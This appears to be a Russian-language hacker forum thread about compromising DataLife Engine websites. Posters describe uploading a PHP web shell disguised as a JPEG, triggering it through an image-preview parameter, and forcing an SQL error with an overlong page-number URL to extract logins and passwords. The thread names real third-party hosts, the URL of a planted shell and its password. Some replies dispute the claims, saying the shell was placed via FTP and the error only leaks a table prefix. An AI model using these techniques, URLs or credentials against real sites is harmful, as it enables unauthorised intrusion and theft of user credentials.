Через Site.ru/engine/images.php удалось залить склеенный шелл с .Jpeg "test1.jpg"

попытка открыть через .php увенчалась неудачей.

http://Site.ru/engine/modules/imagepreview.php?image=http://Site.ru/uploads/posts/2011-12/test1.php

http://Site.ru/uploads/posts/2011-12/test1.php - тож пробывал.

Ну, я имел ввиду сайты, где уже залита уязвимость и в htaccess все как надо прописано. Таких как минимум несколько уже есть - с рутрекера движок поставили многие

Убейте htaccess и разрешите работу php и все зальется.

На 9x это не работает, только на 7х-8х...

Работает и на новых. DLE 9.4

Бага



Шелл



Бага

http://worldcs.idhost.kz/engine/skins/images/jprof.jpeg

Шелла



http://worldcs.idhost.kz/engine/data/new/base.php

пароль:0cp

Еще одна приватная бага ,работает на новых версиях.

Заходим например суда http://soft.wlok.ru

Делаем запрос

http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/

Цифры девять ,нужно написать слитно.

Видим



Раскручивайте дальше сами, я например вытаскивал все пароли и логины.

Datax, Как раскурутить?

скулей, хотя очень сомневаюсь что работает

Datax - пиздобол

engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись

и скули здесь нет, только ошибка, от неё единственная польза префикс к базе